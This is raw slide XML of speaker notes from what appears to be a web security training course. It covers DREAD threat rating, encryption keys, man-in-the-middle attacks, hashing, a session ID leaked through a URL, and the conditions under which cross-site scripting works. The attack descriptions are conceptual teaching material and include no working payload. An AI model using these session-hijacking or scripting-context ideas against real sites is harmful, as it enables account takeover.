                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Two steps needed to carry out an attack</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Create the context</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Drop the attack</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Creating the context is the tough part</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CLIENT-SIDE VALIDATION ON EMAIL ADDRESS IN REGISTER PAGE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7" name="Shape 1357"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1358" name="Shape 1358"/>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By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions: </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>You can use a 1–10 scale for probability where 1 represents a threat that is very unlikely to occur and 10 represents a near certainty. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>You can divide the scale into three bands to generate a High, Medium, or Low risk rating.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>You can use DREAD. The problem with a simplistic rating system is that team members usually will not agree on ratings. At Microsoft, the DREAD model is used to help calculate risk. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="16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7" name="Shape 787"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Shape 788"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Uses one key to:</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Encrypt the data</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Decrypt the data</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Is fast and efficient</a:t>
            </a:r>
            <a:endParaRPr sz="36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9" name="Shape 1379"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1380" name="Shape 1380"/>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9" name="Shape 1389"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1390" name="Shape 1390"/>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7" name="Shape 1397"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1398" name="Shape 1398"/>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2" name="Shape 1402"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1403" name="Shape 1403"/>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After you ask the above questions, count the values (1–3) for a given threat.</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 The result can fall in the range of 5–15. Then you can treat threats with overall ratings of 12–15 as High risk, 8–11 as Medium risk, and 5–7 as Low risk.</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3" name="Shape 1633"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1634" name="Shape 1634"/>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Airline reservations application supports URL rewriting, putting session IDs in the URL: </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An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.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4" name="Shape 1704"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1705" name="Shape 1705"/>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Some other ways we could have done it…  IMPORTANT: once attacker is writing in a scriptable context, the game is over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>#1 is obvious.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>#2 is also fairly straightforward.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>#3 is the same as #2!  Note how it has no quote marks, either.</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The rest of these illustrate that there are many, many places in the DOM which IE will consider scriptable.  This is just a very few of them.</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The question is, “Where does the application place the attacker-controlled text, and from there, can the attacker open up a scriptable context?”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3" name="Shape 1833"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1834" name="Shape 1834"/>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7" name="Shape 1857"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1858" name="Shape 1858"/>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3" name="Shape 1883"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1884" name="Shape 1884"/>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0" name="Shape 1890"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1891" name="Shape 189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5" name="Shape 835"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="836" name="Shape 836"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Emphasis: when one key encrypts *only* the other can decrypt (for all practical purposes)</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>How do you know who the public key belongs to?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>What if public key is intercepted by someone and switched (used to be known as “bucket brigade” attack – MitM more appropriate)?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Why move to symmetric … why not continue to use asymmetric?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="16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4" name="Shape 1904"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1905" name="Shape 1905"/>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1" name="Shape 1911"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1912" name="Shape 1912"/>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8" name="Shape 1918"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1919" name="Shape 1919"/>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6" name="Shape 1926"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1927" name="Shape 1927"/>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4" name="Shape 1934"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1935" name="Shape 1935"/>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2" name="Shape 1942"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1943" name="Shape 1943"/>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0" name="Shape 1950"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1951" name="Shape 195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6" name="Shape 886"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="887" name="Shape 887"/>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Use md5sum to demonstrate.  Syntax: echo foo | md5sum</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Hypothetical use: if you want to ensure some data has not changed, keep a secure record of its hash.  (If the hash can be tampered with, then so can the data.)</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>That makes this illustration incomplete: we need a way to ensure the hash was not tampered, either…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4" name="Shape 1004"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1005" name="Shape 1005"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>Direct class to http://sectech/ssl for certificate issuance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0" name="Shape 1120"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Shape 1121"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
